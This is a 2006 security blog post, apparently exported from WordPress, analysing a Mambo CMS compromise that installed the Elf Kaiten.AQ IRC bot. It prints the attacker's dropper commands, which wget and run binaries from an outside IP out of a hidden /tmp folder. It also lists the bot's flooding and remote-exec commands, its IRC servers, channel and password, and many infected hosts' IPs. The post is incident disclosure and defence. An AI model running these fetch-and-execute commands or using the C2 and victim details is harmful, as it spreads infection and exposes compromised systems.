{"id":111,"date":"2006-06-05T01:02:37","date_gmt":"2006-06-05T05:02:37","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/06\/05\/more-attacks-on-my-web-server\/"},"modified":"2006-06-06T00:04:23","modified_gmt":"2006-06-06T04:04:23","slug":"more-attacks-on-my-web-server","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/06\/05\/more-attacks-on-my-web-server\/","title":{"rendered":"More attacks on my web server [Elf Kaiten.AQ]"},"content":{"rendered":"<p>the same as the last one which was based on Mambo (open source CMS).  This time I was able to pull the files down in time.<br \/>\nEDIT: <a href=\"http:\/\/ghetto.org\/~enkrypted\/newchrousty\/\">More information here<br \/>\ndocumented by enkrypted<\/a><br \/>\nUPDATE: <a href=\"http:\/\/secunia.com\/virus_information\/29599\/elfkaiten.aq\/\">Secunia reports this as Elf Kaiten.AQ<\/a><br \/>\n<a href=\"http:\/\/www.trendmicro.com\/vinfo\/virusencyclo\/default5.asp?VName=ELF%5FKAITEN%2EAQ&amp;VSect=S\">TrendMicro reports the trojan but the statistics are horribly wrong.  Just the channel I&#8217;m monitoring alone has seen hundreads of infections via Mambo<\/a><\/p>\n<p>wget 72.18.195.161\/lnikon<\/p>\n<p>This leads to a small script which executes the following:<br \/>\ncd \/tmp<br \/>\nmkdir .font-jix<br \/>\ncd .font-jix<br \/>\nwget 72.18.195.161\/linux-kernel<br \/>\nchmod +x linux-kernel<br \/>\n.\/linux-kernel<br \/>\ncd \/tmp<br \/>\ncd .font-jix<br \/>\nwget 72.18.195.161\/linux-mkdir<br \/>\nchmod +x linux-mkdir<br \/>\n.\/linux-mkdir<\/p>\n<p>I won&#8217;t paste the strings results from the files here but sufficed to say it&#8217;s headed towards an irc server.  I did find these servers listed:<br \/>\n67.43.234.119<br \/>\nirc.newchrousty.org<br \/>\nSympatico.Qc.Ca.NewChrousty.org<br \/>\nTrois-Rivieres.Qc.Ca.NewChrousty.org<br \/>\nChat.NewChrousty.Org<br \/>\nMicro-ISP.NewChrousty.Org<br \/>\nLaLiPuS.NewChrousty.Org<\/p>\n<p>Some other interesting strings:<br \/>\nNOTICE %s :PAN<br \/>\nNOTICE %s :Panning %s.<br \/>\nNOTICE %s :TSUNAMI<br \/>\nNOTICE %s :Tsunami heading for %s.<br \/>\nNOTICE %s :What kind of subnet address is that? Do something like: 169.40<br \/>\nNOTICE %s :TSUNAMI                            = Special packeter that wont be blocked by most firewalls<br \/>\nNOTICE %s :PAN                          = An advanced syn flooder that will kill most network drivers<br \/>\nNOTICE %s :UDP                          = A udp flooder<br \/>\nNOTICE %s :UNKNOWN                            = Another non-spoof udp flooder<br \/>\nNOTICE %s :NICK                                       = Changes the nick of the client<br \/>\nNOTICE %s :SERVER                                   = Changes servers<br \/>\nNOTICE %s :GETSPOOFS                                        = Gets the current spoofing<br \/>\nNOTICE %s :SPOOFS                                   = Changes spoofing to a subnet<br \/>\nNOTICE %s :DISABLE                                          = Disables all packeting from this client<br \/>\nNOTICE %s :ENABLE                                           = Enables all packeting from this client<br \/>\nNOTICE %s :KILL                                             = Kills the client<br \/>\nNOTICE %s :GET       = Downloads a file off the web and saves it onto the hd<br \/>\nNOTICE %s :VERSION                                    = Requests version of client<br \/>\nNOTICE %s :KILLALL                                      = Kills all current packeting<br \/>\nNOTICE %s :HELP                                          = Displays this<br \/>\nNOTICE %s :IRC                            = Sends this command to the server<br \/>\nNOTICE %s :SH                             = Executes a command<\/p>\n<p>UPDATE: Everything goes to a channel called #mambolizo with password &#8216;leet&#8217;<br \/>\nHere is a sample of infected IP&#8217;s<\/p>\n<p>#mambolizo AUSTI H ~KVDJQ@81.192.114.78 (ZVYRRUU)<br \/>\n#mambolizo AXEUGVS H ~RUSC@80.71.219.42 (NUVQT)<br \/>\n#mambolizo AZBCPAT H ~QTBQJGAH@217.126.24.185 (LVNVG)<br \/>\n#mambolizo Aarh H ~discern@63.89.31.130 (silenc)<br \/>\n#mambolizo Aarhu H ~sett@63.89.31.130 (chef)<br \/>\n#mambolizo Aarhus H ~psych@63.89.31.130 (Aarhus)<br \/>\n#mambolizo BDMIO H ~EHKFTIRL@81.15.157.171 (DJVB)<br \/>\n#mambolizo BEUKTL H ~WCBJMEWJ@81.223.209.211 (EHTSVU)<br \/>\n#mambolizo BFFENJ H ~HZTMPV@217.157.235.41 (KWTE)<br \/>\n#mambolizo BFJEK H ~TFPS@213.55.30.241 (AZOSUKK)<br \/>\n#mambolizo BGYUO H ~QLOJD@193.157.66.96 (HJCRMV)<br \/>\n#mambolizo BLFDWBC H ~IGNYV@69.60.124.43 (UIQP)<br \/>\n#mambolizo BLMWK H ~PFWTCHIQ@202.155.6.237 (LAZYZN)<br \/>\n#mambolizo BMJQF H network@68.51.46.205 (UNSRD)<br \/>\n#mambolizo BPIJ H ~AWWLXM@202.83.174.36 (PMTFK)<br \/>\n#mambolizo BPPTPSN H ~ALCTDEWH@85.17.6.163 (YXQDAYQ)<br \/>\n#mambolizo BUXL H ~FBGNOOO@68.189.182.37 (VCGZ)<br \/>\n#mambolizo BXXMOK H ~ZBDKNNE@202.129.46.90 (GSWTDH)<br \/>\n#mambolizo CAHI H ~MTCSU@129.105.249.208 (JMLZ)<br \/>\n#mambolizo CAIZFQV H ~QPRM@82.165.177.236 (FODPLD)<br \/>\n#mambolizo CBZYU H ~AFBZKZ@85.20.35.66 (PFBBQXJR)<br \/>\n#mambolizo CCMLG H ~QSZKPUD@194.106.17.163 (DGLJLZD)<br \/>\n#mambolizo CCQPE H ~RELLEXA@61.220.191.21 (NTLI)<br \/>\n#mambolizo CCQRYBDM H ~FGHQRKAZ@24.63.215.68 (KFYBYOPR)<br \/>\n#mambolizo CDDDJBKB H ~DHXFP@201.217.215.66 (SWCVII)<br \/>\n#mambolizo CFGXYWV H ~THCRIR@85.124.118.43 (GFDWO)<br \/>\n#mambolizo CHABLA H ~XFGRR@193.157.66.96 (JDXK)<br \/>\n#mambolizo CHDQT H ~YUVWLSI@62.90.45.58 (BVLS)<br \/>\n#mambolizo CIUKSB H ~IGYF@207.170.12.72 (WUJHUJSG)<br \/>\n#mambolizo CLOAVSF H ~KPILEJS@213.55.30.241 (FPTVTLKI)<br \/>\n#mambolizo CLSA H ~ARZIVGWJ@24.63.215.68 (XXPG)<br \/>\n#mambolizo CTEM H ~VCDHTEE@130.234.7.72 (HKHTFIA)<br \/>\n#mambolizo CUKXSY H ~SDZLBNG@193.95.249.225 (JLGZS)<br \/>\n#mambolizo CUPKX H ~SIIEQCX@201.224.164.91 (LLVKOKO)<br \/>\n#mambolizo CWYKTNJ H ~QVPP@61.178.85.114 (BXUPLXM)<br \/>\n#mambolizo CXOWBXKI H ~ZJPVHC@213.55.30.241 (QZJP)<br \/>\n#mambolizo CZZPVI H ~JMCL@68.143.64.178 (HFQWJH)<br \/>\n#mambolizo DANMLPKU H ~JMGVKQ@61.220.191.9 (WGCJWERN)<br \/>\n#mambolizo DATECLLS H www-data@217.126.49.173 (XQHI)<br \/>\n#mambolizo DBBHZ H ~NTUT@203.55.23.51 (FTOMOL)<br \/>\n#mambolizo DIJZMBU H ~RECI@196.209.16.57 (KJTY)<br \/>\n#mambolizo DIKOUW H ~WVRFYL@24.28.88.134 (VKVLXCSJ)<br \/>\n#mambolizo DLIWY H www-data@62.94.123.42 (QPZN)<br \/>\n#mambolizo DOWC H ~ZVJL@213.55.30.241 (OPKSJ)<br \/>\n#mambolizo DRKGEP H ~QRYV@69.40.247.160 (RAEGOPKP)<br \/>\n#mambolizo DYFTYUG H ~GGDRNI@213.225.48.85 (GBVJOKOF)<br \/>\n#mambolizo DYZDB H ~CNLNG@193.157.66.96 (GDVKBW)<br \/>\n#mambolizo DZFZOVII H ~VSHPVG@84.170.216.17 (JHXUMND)<br \/>\n#mambolizo DZRU H ~JXCHPQX@202.143.173.83 (JRIRFKAJ)<br \/>\n#mambolizo EAISZOUV H hidden-use@163.21.50.253 (ZWQPAHN)<br \/>\n#mambolizo EARBYA H ~DEIF@130.13.141.109 (EIRJLAMR)<br \/>\n#mambolizo EARBYG H ~TPRULQW@213.243.33.117 (XJDI)<br \/>\n#mambolizo EGTE H ~RWBHQPDH@218.226.219.50 (LNIK)<br \/>\n#mambolizo ELTKP H ~ZEDEQK@83.30.227.15 (NNUKQM)<br \/>\n#mambolizo EMJD H ~BPLL@83.133.81.92 (FIARDNC)<br \/>\n#mambolizo EQBPZKH H ~JELWXQG@67.161.213.233 (HYDRCKDU)<br \/>\n#mambolizo EQPL H ~JJXJ@202.143.101.131 (DNHJQW)<br \/>\n#mambolizo FCWJE H ~JQLN@203.172.129.2 (VNSFD)<br \/>\n#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.201 (PIKEA)<br \/>\n#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.51 (PIKEA)<br \/>\n#mambolizo FKTN H ~FENLCJWQ@194.106.17.163 (FQWXA)<br \/>\n#mambolizo FPQXF H ~KOGHXI@81.223.209.211 (HMDH)<br \/>\n#mambolizo FUDJ H ~LDKVXAK@208.200.133.2 (GCDVMC)<br \/>\n#mambolizo GDBUUEX H ~VKOK@217.149.127.14 (FHFKBT)<br \/>\n#mambolizo GDBYKPKT H ~FCVFJCOB@69.60.124.43 (LGITHJ)<br \/>\n#mambolizo GDZJWT H ~OVFVDTWX@84.57.40.96 (YFXKHJ)<br \/>\n#mambolizo GEQNJVP H ~LILIWKOF@213.243.33.117 (EGMHFA)<br \/>\n#mambolizo GGCBZ H ~AOLZC@140.113.214.180 (CWAB)<br \/>\n#mambolizo GJATO H ~QSEK@82.151.192.61 (AGQPV)<br \/>\n#mambolizo GKHJX H ~WFXYXSI@201.135.134.24 (CTYSG)<br \/>\n#mambolizo GLUGHMP H ~LTDVBWSE@130.94.124.180 (FBWJ)<br \/>\n#mambolizo GOTTSJXC H ~MICTUNNR@61.183.207.183 (NFPBHG)<br \/>\n#mambolizo GUAOBGG H ~MKVQSWY@147.123.155.1 (CMSRZ)<br \/>\n#mambolizo GUYW H ~PAGXEM@67.53.244.228 (XTIN)<br \/>\n#mambolizo GXVAAI H ~VMPX@81.185.145.216 (AVTYXUBA)<br \/>\n#mambolizo GZHEFEG H ~LMVQXFJF@61.183.207.183 (NUNDDSEG)<br \/>\n#mambolizo HAZBZF H ~TSPKOA@202.51.31.246 (IQIKO)<br \/>\n#mambolizo HFPSGS H ~BZMUKKGZ@66.77.26.70 (GLKAKIC)<br \/>\n#mambolizo HYHHWVZ H ~PJBGTB@151.42.226.237 (YASI)<br \/>\n#mambolizo IAMARBMY H ~XTEKZPG@210.173.173.29 (XJNJIYOD)<br \/>\n#mambolizo ICIPEYX H ~PVEBNWFZ@217.126.233.168 (ABUTYCLZ)<br \/>\n#mambolizo ICJQTBW H ~LAKULZNH@206.248.136.95 (AXTOOZY)<br \/>\n#mambolizo IJBTV H ~COZRLFS@83.18.171.82 (ISALRYV)<br \/>\n#mambolizo IKJAJ H ~DPGY@201.102.71.14 (CAJMCB)<br \/>\n#mambolizo IOUEJS H ~PKVY@201.135.134.24 (FEGH)<br \/>\n#mambolizo IVOCSE H ~QPLT@82.149.166.130 (JZWLWXG)<br \/>\n#mambolizo IWJCB H ~TFDKHNL@81.235.163.148 (TWNSMVC)<br \/>\n#mambolizo JFKDMPW H ~PRWEH@149.156.5.206 (TLUWXDR)<br \/>\n#mambolizo JGQCU H ~YYMEHSAP@217.194.97.70 (SZEJFKNQ)<br \/>\n#mambolizo JSUVEF H ~XWCUGCY@83.18.171.82 (TYOVFQH)<br \/>\n#mambolizo JTGX H ~WRTL@65.75.138.190 (RNFX)<br \/>\n#mambolizo KAJXDC H ~XUPPT@213.169.62.179 (TWSP)<br \/>\n#mambolizo KARLYLG H ~OXHGW@69.60.124.43 (AHQJPJB)<br \/>\n#mambolizo KEMP H ~FDCL@80.32.194.218 (RYXZDOFZ)<br \/>\n#mambolizo KENLHRT H ~SKGU@219.117.251.138 (MFXC)<br \/>\n#mambolizo KJUFOM H ~ZCNFYM@82.226.252.2 (FQCMBT)<br \/>\n#mambolizo KNMH H ~UCSYGE@203.125.140.52 (NXOSOEM)<br \/>\n#mambolizo KOZPTXL H ~LQROMHV@209.200.14.230 (PZNP)<br \/>\n#mambolizo KUBVHXA H ~RVOKD@202.155.108.36 (OOCQBL)<br \/>\n#mambolizo KVNE H ~FYZCCF@69.159.203.110 (XTCRZ)<br \/>\n#mambolizo LCVNCLWI H ~CYCBXJM@203.219.147.14 (PSCRO)<br \/>\n#mambolizo LJBNJPR H ~YYFQIM@194.106.17.163 (ORKU)<br \/>\n#mambolizo LKQOBCR H ~UFCAXS@83.109.10.152 (FDQXQ)<br \/>\n#mambolizo LMXMHIL H ~PAMUKHBU@84.157.157.8 (DRTX)<br \/>\n#mambolizo LUMI H ~DUSGPLUQ@61.178.85.114 (XLCDPC)<br \/>\n#mambolizo LWNPI H ~XKDFDUFZ@83.133.81.92 (VBUPE)<br \/>\n#mambolizo MDSZWP H ~KOFUXKDT@64.146.134.133 (AMLM)<br \/>\n#mambolizo MNJVN H ~KPPEKY@65.204.137.200 (FRTRJRX)<br \/>\n#mambolizo MNLTYGNB H ~DZOEL@85.53.64.206 (IMQTC)<br \/>\n#mambolizo MQOFNW H ~GZGC@66.77.26.70 (RVBZQMCR)<br \/>\n#mambolizo MSQQKO H ~GZVTAMV@209.200.14.230 (XZXWNV)<br \/>\n#mambolizo MUVF H ~RAPR@202.172.54.61 (KCMSZSAP)<br \/>\n#mambolizo NDVC H ~IDIY@207.225.61.10 (AERF)<br \/>\n#mambolizo NFRC H ~JZBF@80.34.96.60 (BVFMEPT)<br \/>\n#mambolizo NHGZ H ~HSOOIPV@195.117.103.58 (HARGJ)<br \/>\n#mambolizo NNCXJJUD H ~ULST@81.241.202.21 (FLDSMSFH)<br \/>\n#mambolizo NOBMQ H ~GMHFK@69.64.49.62 (PWPRV)<br \/>\n#mambolizo NQQG H ~NOUP@66.77.26.70 (LMYTO)<br \/>\n#mambolizo NQUUBED H ~SSTLZW@81.223.209.211 (RGAOYT)<br \/>\n#mambolizo NSFCMC H ~EMVAI@203.55.23.201 (VHGIDT)<br \/>\n#mambolizo NSFCMC H ~EMVAI@203.55.23.51 (VHGIDT)<br \/>\n#mambolizo OHIJSLD H ~RKFDPEQ@217.194.97.70 (XDZP)<br \/>\n#mambolizo OKMBMPZH H ~CGYYJU@213.55.30.241 (EJPRHUP)<br \/>\n#mambolizo OOZGM H ~RMWD@84.87.219.36 (UMRTUVJ)<br \/>\n#mambolizo OQBIPNE H ~FRBI@12.36.175.159 (HLNUXRE)<br \/>\n#mambolizo OSUFFLN H ~CDWR@81.57.87.84 (SSFILJM)<br \/>\n#mambolizo OWWX H ~PYSCZ@66.160.135.87 (SEEG)<br \/>\n#mambolizo OXBQOHG H ~ESDIGP@195.117.179.10 (IRMB)<br \/>\n#mambolizo OYXU H ~RLCKXFI@193.170.41.50 (VYBMH)<br \/>\n#mambolizo OZAW H ~EEARLYDZ@194.144.126.233 (GFQVEZ)<br \/>\n#mambolizo PESOQIV H ~QBETMCB@82.236.226.54 (VFPMBQRE)<br \/>\n#mambolizo PFJOZ H ~ZLPNODPB@141.21.7.60 (VDIW)<br \/>\n#mambolizo PFVHK H ~PFGR@217.206.217.199 (XXIO)<br \/>\n#mambolizo PHQWJN H ~SSNITPJ@203.55.23.201 (KOZVB)<br \/>\n#mambolizo PVZB H ~EHDJJNT@82.226.118.139 (KRMNB)<br \/>\n#mambolizo PZAHGJI H ~MDVPQJV@202.143.173.83 (BYTLFC)<br \/>\n#mambolizo QBUITDX H ~DZOEL@85.53.64.206 (IMQTC)<br \/>\n#mambolizo QDCNYMS H ~HFXJM@64.242.180.2 (JSNAOR)<br \/>\n#mambolizo QNHPC H www-data@149.156.124.6 (GWTJQULB)<br \/>\n#mambolizo QUENMWN H ~BFKTK@24.31.6.188 (MQQV)<br \/>\n#mambolizo QYUEMXD H ~TAIK@213.54.172.75 (YSZEWBU)<br \/>\n#mambolizo QYUEMXD H ~TAIK@85.212.30.189 (YSZEWBU)<br \/>\n#mambolizo RAOBFQ H ~SBYWMC@61.7.147.47 (YPVFVERO)<br \/>\n#mambolizo RBOVLKIT H ~ZKGEC@81.209.59.194 (HKEXGZ)<br \/>\n#mambolizo RBXWI H ~OPVPGPU@217.170.13.48 (VPWRI)<br \/>\n#mambolizo RCPQMAKE H ~EEGGOQ@213.228.166.47 (BAFQV)<br \/>\n#mambolizo RDHFDU H ~ITBNE@82.155.145.235 (XYKWRWKZ)<br \/>\n#mambolizo RGDFZTMA H ~ZVZKTVVL@64.76.81.153 (FCQZ)<br \/>\n#mambolizo RJOWRVQB H ~NBJH@193.68.47.28 (ONOFS)<br \/>\n#mambolizo RMOSO H ~QOVPYK@201.17.175.51 (MHRRMUB)<br \/>\n#mambolizo ROWA H ~WJNHEAIZ@130.94.124.180 (CSETK)<br \/>\n#mambolizo RQYEFCO H ~PRGHXC@80.32.194.218 (XFBCC)<br \/>\n#mambolizo RSYGMGNZ H ~PUAQLO@193.40.142.254 (GUAD)<br \/>\n#mambolizo RUJG H ~ACVZ@68.189.182.37 (FLTABBA)<br \/>\n#mambolizo RXBV H ~MZUW@217.227.216.244 (AFVWDV)<br \/>\n#mambolizo RXBV H ~MZUW@217.227.226.182 (AFVWDV)<br \/>\n#mambolizo RZYDFBT H ~SGEOXUL@217.170.13.48 (NOPBQH)<br \/>\n#mambolizo SAURG H ~FDKKWST@193.170.41.50 (VHKN)<br \/>\n#mambolizo SBUXGR H ~AOLZC@140.113.214.180 (CWAB)<br \/>\n#mambolizo SCLT H ~TIQCMYV@217.206.217.199 (KHXRV)<br \/>\n#mambolizo SDXL H ~YMJVN@194.210.98.160 (XMCLL)<br \/>\n#mambolizo SEVRKJE H ~DNPT@83.28.39.209 (CUUPNS)<br \/>\n#mambolizo SEXWCEP H ~CRZBRIS@194.242.112.72 (EFUV)<br \/>\n#mambolizo SGLVRMEC H hidden-use@163.21.50.253 (RJLCLPZH)<br \/>\n#mambolizo SHDEMF H ~ODWMB@217.194.97.70 (YBMJJ)<br \/>\n#mambolizo SKAZE H ~EPCVZOKX@218.208.118.66 (SALC)<br \/>\n#mambolizo SKFIJTQ H ~VQFM@217.194.97.70 (QTXSSIWL)<br \/>\n#mambolizo SLBV H ~UDCWYGU@141.21.7.60 (NWESN)<br \/>\n#mambolizo SNJJRJNW H ~AYMTX@84.157.129.23 (GEDSORSY)<br \/>\n#mambolizo SNJJRJNW H ~AYMTX@84.157.197.113 (GEDSORSY)<br \/>\n#mambolizo SNUK H ~KTACK@209.200.14.230 (RYCBPV)<br \/>\n#mambolizo SPDR H ~GJOTW@209.172.33.199 (BZSAJMBC)<br \/>\n#mambolizo SSCDAPCS H ~FBBCYTAU@61.178.85.114 (VHALHLC)<br \/>\n#mambolizo SSQGHMH H ~VJVO@87.78.22.107 (MIPBN)<br \/>\n#mambolizo SSSZEAD H ~VAHAR@213.225.48.85 (YEAQJL)<br \/>\n#mambolizo TCJJXJ H ~TFPS@62.217.143.90 (AZOSUKK)<br \/>\n#mambolizo TCJS H ~PIHOXNG@196.28.49.199 (JXUMUDP)<br \/>\n#mambolizo TDMVTPAQ H ~MXRRVGGE@82.165.37.165 (BARPIQB)<br \/>\n#mambolizo TDUQZKXN H ~XAPAFYDJ@209.216.245.146 (PVOOD)<br \/>\n#mambolizo TEYTUIAP H ~YVFF@81.190.195.44 (EVLVIVRP)<br \/>\n#mambolizo TFNX H ~RSQPBS@82.151.192.61 (RSKLC)<br \/>\n#mambolizo THAQRBF H ~PQXZMFG@84.157.157.8 (OSXP)<br \/>\n#mambolizo TKFWFFW H ~GOPC@147.123.155.1 (MVQNLUW)<br \/>\n#mambolizo TKRKMOWV H ~AMFVAX@213.55.30.241 (CRJO)<br \/>\n#mambolizo TMEAMDQ H ~NTBMC@201.252.133.28 (EOVXNYS)<br \/>\n#mambolizo TMKUCU H ~MDAPF@202.143.162.98 (DUQANROU)<br \/>\n#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.127.173 (YMUPV)<br \/>\n#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.95.234 (YMUPV)<br \/>\n#mambolizo TPMIJD H ~YGUFM@130.94.124.180 (IBVJLDOI)<br \/>\n#mambolizo TRBTSS H ~AHMT@84.19.188.50 (FHTYM)<br \/>\n#mambolizo TROPYYWG H ~NZWO@203.55.23.201 (ABATV)<br \/>\n#mambolizo TUCJQB H ~PQZWTXZ@83.18.171.82 (EGVFI)<br \/>\n#mambolizo TXJRS H ~AGFHDY@67.161.213.233 (KYDT)<br \/>\n#mambolizo UBAG H ~MIKSLQWA@69.56.145.164 (IYUL)<br \/>\n#mambolizo UDEBAS H ~BFWLLE@217.157.235.41 (EOJDZU)<br \/>\n#mambolizo UGMNX H ~PVJKLW@203.55.23.201 (ANWOSOAK)<br \/>\n#mambolizo UGMNX H ~PVJKLW@203.55.23.51 (ANWOSOAK)<br \/>\n#mambolizo ULOV H ~PJOHXM@64.8.101.98 (IHFAMPE)<br \/>\n#mambolizo UMBAVBD H ~PULOQIE@201.135.134.24 (VYDWNXFO)<br \/>\n#mambolizo UPJREYD H ~WQUG@203.214.54.20 (ELEWRN)<br \/>\n#mambolizo UVPTWOUH H ~DZWC@147.102.101.91 (ESVQ)<br \/>\n#mambolizo VAZY H ~QPXYKO@203.55.23.51 (GMAIMGYH)<br \/>\n#mambolizo VDWD H ~CXRCMW@68.18.93.131 (MSOZRSR)<br \/>\n#mambolizo VEMQW H ~OGAZRKS@130.94.124.180 (FMALIBDI)<br \/>\n#mambolizo VFKRTQK H ~CPUYPZV@69.40.247.160 (BWFQ)<br \/>\n#mambolizo VKYPGN H ~RVTRABT@193.157.66.96 (JFVEWAPY)<br \/>\n#mambolizo VNPE H ~TFTH@213.55.30.241 (CFXTI)<br \/>\n#mambolizo VVPGC H ~VPGL@82.151.199.57 (SEDXUJTO)<br \/>\n#mambolizo VYPUVJJ H apache@148.244.169.141 (BCTF)<br \/>\n#mambolizo VZBQBK H ~DMZJJKEN@69.196.142.78 (DYPMFCGI)<br \/>\n#mambolizo WEANO H ~PCXCXWEG@83.18.171.82 (CWNVDO)<br \/>\n#mambolizo WKFJYXMW H ~WWBB@212.98.165.220 (HQSKN)<br \/>\n#mambolizo WQYEGXY H ~TIUSRLG@83.133.81.92 (KXCFM)<br \/>\n#mambolizo WSIJLO H ~BIXU@130.94.124.180 (YCUQQHZ)<br \/>\n#mambolizo WTPDHZ H ~PUSWTV@69.60.124.43 (TJVPZCLQ)<br \/>\n#mambolizo WVEAKNI H ~PRHBM@204.1.16.2 (ZIJALNH)<br \/>\n#mambolizo WVHQX H ~PZGUAAQD@82.236.226.54 (JFOOWP)<br \/>\n#mambolizo WZHSWZE H ~VWSBA@24.31.6.188 (DWXDOXF)<br \/>\n#mambolizo XACGE H ~PVKI@213.60.56.216 (JTDEML)<br \/>\n#mambolizo XBCYE H ~JSBRQ@193.157.66.96 (CQXQY)<br \/>\n#mambolizo XBGMKWFT H ~XVEJLF@202.172.239.112 (HJUJPF)<br \/>\n#mambolizo XCKHTC H ~VJTSL@219.94.130.26 (DTVGLPGL)<br \/>\n#mambolizo XICWY H ~HBZVYDZY@24.63.215.68 (TKQIVHC)<br \/>\n#mambolizo XNAOKHY H ~UVLH@85.53.64.206 (VPHOIOM)<br \/>\n#mambolizo XPMIJ H ~RCXMIP@67.53.244.228 (KJLM)<br \/>\n#mambolizo XQIQR H ~JZWRVZW@206.33.2.132 (OHAY)<br \/>\n#mambolizo XTDWV H ~SFHVQA@203.55.23.201 (KYQPKBJ)<br \/>\n#mambolizo XTDWV H ~SFHVQA@203.55.23.51 (KYQPKBJ)<br \/>\n#mambolizo XVADU H ~SPJR@217.206.217.199 (SMMXING)<br \/>\n#mambolizo XXVOR H ~MEUVLICC@194.106.17.163 (KGOZT)<br \/>\n#mambolizo YBHDN H ~ANSRK@69.60.124.43 (PCMT)<br \/>\n#mambolizo YCWVOQS H ~VAHAR@213.225.48.85 (YEAQJL)<br \/>\n#mambolizo YDRBQVP H ~KHHGR@202.71.143.2 (EKJRWSD)<br \/>\n#mambolizo YEYMEGHV H ~LCQYVW@84.149.127.173 (JJDB)<br \/>\n#mambolizo YEYMEGHV H ~LCQYVW@84.149.95.234 (JJDB)<br \/>\n#mambolizo YFADXOXO H ~RIRY@82.226.118.139 (FOBA)<br \/>\n#mambolizo YGTGW H ~GJAX@80.32.194.218 (LKIWEUOI)<br \/>\n#mambolizo YKBEJBR H ~NWCK@203.219.147.14 (WDQHWIYX)<br \/>\n#mambolizo YLBIVW H ~DHMM@84.255.202.157 (MIBEYIW)<br \/>\n#mambolizo YQTTOQGI H ~RGQNUXW@85.234.143.14 (AJFO)<br \/>\n#mambolizo YRODPMA H ~NSPLIXE@82.226.252.2 (UQVTRTFM)<br \/>\n#mambolizo YYNN H ~WJTKTGY@67.161.213.233 (JRXX)<br \/>\n#mambolizo ZJZYZNIZ H ~VMFIZB@66.77.26.70 (BJOETM)<br \/>\n#mambolizo ZMYJZRMN H ~SSTLZW@81.223.209.211 (RGAOYT)<br \/>\n#mambolizo ZNEV H ~LABU@202.143.162.98 (UEFA)<br \/>\n#mambolizo ZOIA H ~VMMHAW@151.1.140.34 (XGTEB)<br \/>\n#mambolizo ZXNLPD H ~SLIBKNS@82.146.17.37 (ROHJSIC)<br \/>\n#mambolizo ZZCHGQ H ~OUPNMIZQ@83.138.146.85 (DCEHMJE)<\/p>\n<p>If you are on this list format, reinstall now.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time. EDIT: More information here documented by enkrypted UPDATE: Secunia reports this as Elf Kaiten.AQ TrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I&#8217;m monitoring [&hellip;]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,275,431],"tags":[],"class_list":["post-111","post","type-post","status-publish","format-standard","hentry","category-digital-warfare","category-vulnerabilities","category-zeroday"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=111"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/111\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=111"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=111"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}